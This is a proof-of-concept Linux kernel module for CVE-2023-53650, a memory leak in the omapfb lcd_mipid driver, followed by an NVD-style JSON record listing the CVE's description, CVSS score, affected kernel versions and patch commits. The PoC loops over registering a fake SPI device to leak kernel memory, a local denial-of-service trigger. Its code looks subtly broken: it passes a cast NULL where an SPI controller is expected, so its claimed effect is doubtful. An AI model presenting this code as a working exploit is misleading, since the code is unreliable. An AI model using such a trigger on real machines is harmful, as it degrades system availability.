CVE-2023-53650

/* CVE-2023-53650 - Linux Kernel omapfb lcd_mipid Memory Leak PoC * This PoC demonstrates the memory leak by repeatedly triggering * mipid_spi_probe() with a fake SPI device that causes mipid_detect() to fail. * * Note: This requires kernel module compilation and root privileges to load. */ #include <linux/module.h> #include <linux/spi/spi.h> #include <linux/kernel.h> #include <linux/init.h> MODULE_LICENSE("GPL"); MODULE_AUTHOR("Security Research"); MODULE_DESCRIPTION("PoC for CVE-2023-53650 omapfb lcd_mipid memory leak"); /* Simulate SPI device that will cause mipid_detect() to fail */ static struct spi_device *fake_spi_device; static int __init leak_trigger_init(void) { int i; struct spi_board_info chip = { .modalias = "panel-mipid", .bus_num = 0, .chip_select = 0, .max_speed_hz = 1000000, }; printk(KERN_INFO "CVE-2023-53650 PoC: Triggering memory leak\n"); /* Repeatedly register/deregister SPI device to trigger probe failures */ for (i = 0; i < 1000; i++) { fake_spi_device = spi_new_device(to_spi_device(NULL), &chip); if (fake_spi_device) { spi_unregister_device(fake_spi_device); } /* Each failed probe leaks one mipid_device struct */ } printk(KERN_INFO "CVE-2023-53650 PoC: Memory leak triggered, check /proc/meminfo\n"); return 0; } static void __exit leak_trigger_exit(void) { printk(KERN_INFO "CVE-2023-53650 PoC: Module unloaded\n"); } module_init(leak_trigger_init); module_exit(leak_trigger_exit);

{"cve": {"id": "CVE-2023-53650", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:48.500", "lastModified": "2026-02-03T22:28:53.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfbdev: omapfb: lcd_mipid: Fix an error handling path in mipid_spi_probe()\n\nIf 'mipid_detect()' fails, we must free 'md' to avoid a memory leak."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.32", "versionEndExcluding": "4.14.322", "matchCriteriaId": "CE73FC1A-07E2-4D9A-AF1E-8AA66E7D850E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.291", "matchCriteriaId": "D2D2CA9F-4CC4-4AF5-8C6D-E58415AB782E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.251", "matchCriteriaId": "7FA663C4-CA72-4B5A-8592-7354D978F58E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.188", "matchCriteriaId": "43CAE50A-4A6C-488E-813C-F8DB77C13C8B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.121", "matchCriteriaId": "EC77775B-EC31-4966-966C-1286C02B2A85"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.39", "matchCriteriaId": "9BD1D4A1-304D-4187-8178-6D7C0050B1AF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.3.13", "matchCriteriaId": "95CB4836-7F5D-4C20-B025-8E046EC87B78"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4", "versionEndExcluding": "6.4.4", "matchCriteriaId": "6AB81046-CB69-4115-924C-963B37C41385"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/09ea1ae4a2ec17774892cfcff50f6d33dfa1e06f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3b4c21804076e461a6453ee4d09872172336aa1d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/716efd08985e3104031d1b655930b1f1c45fa8a7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/79a3908d1ea6c35157a6d907b1a9d8ec06015e7a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7a8f9293bee51183023c5e37e7ebf0543cd2a134", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7cca0af3167dd9603da5fa6fff3392f8338e97e1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9e3858f82e3ced1e990ef7116c3a16c84e62093e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ce6e0434e502abdf966164b7c72523fb5fe54635", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d97840bf5a388c6cbf6e46216887bf17be62acc2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}